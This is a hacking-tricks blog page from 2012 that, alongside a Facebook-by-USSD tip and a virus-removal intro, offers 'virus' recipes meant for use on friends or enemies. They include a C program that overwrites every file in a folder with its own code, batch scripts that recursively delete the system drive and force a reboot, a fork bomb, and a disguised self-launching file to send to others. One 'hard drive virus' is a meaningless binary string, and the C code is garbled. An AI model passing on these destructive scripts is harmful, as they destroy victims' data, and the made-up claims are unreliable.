WELCOME Learn Hacking web site

With our help approve your genuine adsense account within 4 hours only. We will Help you to get maximum revenue from your website blog,wordpress .ect show contact me www.fb.com/mayur.khokhar1

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Showing posts with label creat a virus. Show all posts
Showing posts with label creat a virus. Show all posts

Thursday, 6 December 2012

Trick to Use Facebook on any Mobile without Internet

by mayur khokhar

we have come up with the Trick to Use Facebook on any Mobile without Internet.





Any Mobile ... ? Seems to be Strange ? Yes it is Right.There is a Trick to Use Facebook on " Any Mobile " without Internet whether it is the Old Phone like Nokia 1100, that even doesn't have the Web Browser and may not work well other than the Phone Calling Purpose.

So if you are one of the Person with Old Mobile Phone or having the Phone at Remote place where no GPRS or Internet Connectivity with your Phone is available then this is the Trick for You.

So just take a Look and follow the simple steps :

Dial *325# ( or *fbk# ) from Your Mobile Phone and
Write Your Facebook Username and Password according to the Menu and You will be able to use Facebook on Mobile with Internet.
You can then Send Number Based Commands to Access various features of Facebook, Chat with Friends who are Online, Add New Friends, and much more.














































Note : This Service is presently available for Airtel, Aircel, Idea and Tata Docomo Users in India only and You will be Charged only ` 1.00 per day ( a Subscription Fee ) for Unlimited Usage.
So it is a simple Trick to Use Facebook on any Mobile without I

VIRUS CODE-2


/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......


#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
 

Trick to make PowerFull Worm Virus.

by mayur khokhar softwere enginier
Worms are Programs that Replicate themselves from System to System without the use of a Host File. Worms generally Exist inside the other Files like Word or Excel Documents. This Trick can be used to annoy Friends or Enemy.
Note : Run this file at your own Risk. I am not Responsible for any Accident caused by this File on your Computer.Here is Trick to make PowerFull Worm Virus.

1) Open Notepad and type "Start Virus Virus.bat".
2) Save it as and Virus.bat.
3) Now create shortcut to this File so it looks more Serious.
4) Now go to Properties and Change Icon.
5) Now Rename it and Send it to anyone.
6) Now it is done.
So it is simple Trick to make PowerFull Worm Virus.

Trick to make Poison Virus

by mayur khokhar
There is Trick to make a Poison Virus i.e Virus which would definetly lead to destruction in computer.
This trick can be used to annoy Friends or Enemy.

This Virus would ask to choose a number
between 1 - 5 and then do a certain action :




1) Shutdown
2) Restart
3) Wipes out your hard drive (BEWARE).
4) Net send
5) Messages then shutdown

To make this simple virus follow these simple steps :

1) Open Notepad.

2) Copy and Paste the following Code into Notepad :

@echo off
title The end of the world
cd C:\
:menu
cls
echo
I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two


3) Save it as PoisonVirus.bat.

4) Now it is done.

So it is a simple Trick to make Poison Virus.

creat a virus hard drive

There is a Trick to make a Virus which can Format and Destroy Hard Drive using Notepad. This Virus can be used to annoy your friends or enemy. Touse this Trick follow the simple steps given below :
1) Open Notepad.
2) Copy and Paste the given Code into Notepad :




01001011000111110010010101010101010000011111100000

3) Save it as HardDriveVirus.exe.
4) Now it is done.
5) Don't Run this Fle on your Own Computer. If you run this file the Hard Drive would be Formated.
So it is a simple Trick to make a Virus which can Format and Destroy Hard Drive

Tricks to make Simple Virus

by mayur khokhar

There are many Virus which we an develop or can make easily. As I already posted earlier about many Tricks to make Virus, Now here are some more Tricks to make Simple Virus. To make them use the following Trick :
1) Open Notepad
2) Copy and Paste the given below Code of your Choice i.e. type of Virus you want to make :



a) To Delete all the Content of a Drive use this Code :
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
b) To Crush the Windows use this Code :
@Echo off
Del C:\ *.* y
c) To make Computer Restart simultaneously use this Code :
@echo off shutdown -r -f -t 00
d) To make Fork Virus to open many Command Prompts use this Code :
start
%0
goto :s
3) Now Save these Files with any desired name with .bat extention.
4) Don't Run these Files on Your own Computer otherwise the Result you already know.
So these are simple Tricks to make Simple Virus.

creat a virus hard drive

There is a Trick to make a Virus which can Format and Destroy Hard Drive using Notepad. This Virus can be used to annoy your friends or enemy. Touse this Trick follow the simple steps given below :
1) Open Notepad.
2) Copy and Paste the given Code into Notepad :




01001011000111110010010101010101010000011111100000

3) Save it as HardDriveVirus.exe.
4) Now it is done.
5) Don't Run this Fle on your Own Computer. If you run this file the Hard Drive would be Formated.
So it is a simple Trick to make a Virus which can Format and Destroy Hard Drive

Thursday, 29 November 2012

Delete Autorun.inf Virus Manually using just Winrar

by mayur khokhar


Once it happened to a friend of mine, when his newly bought laptop was infected with this autorun.inf virus. This virus corrupted almost all the  drives on the Hard disk, and when ever he tried to double click on the drive or opening  any drive it opened in a new window. In some cases, when your drive is infected with this Autorun.inf virus, you won’t be able to access the drive completely. You have to browse the drive by Exploring it i.e; Ctrl+E keys from the keyboard.
Remove autorun.inf virus from windows
Sometimes ever you will not be able to see hidden files even if you have Show hidden files Enabled under Folder Options. well, this are all the wonders of this Autorun.inf virus.
I am going to show you this rare method of removing Autorun.inf manually using just winrar application, not any antivirus or malware programs.

***For free Breaking News Alerts just sms JOIN NAXATRANEWS to 567678********For free Adult Jokes just sms JOIN 18JOKES to 567678*****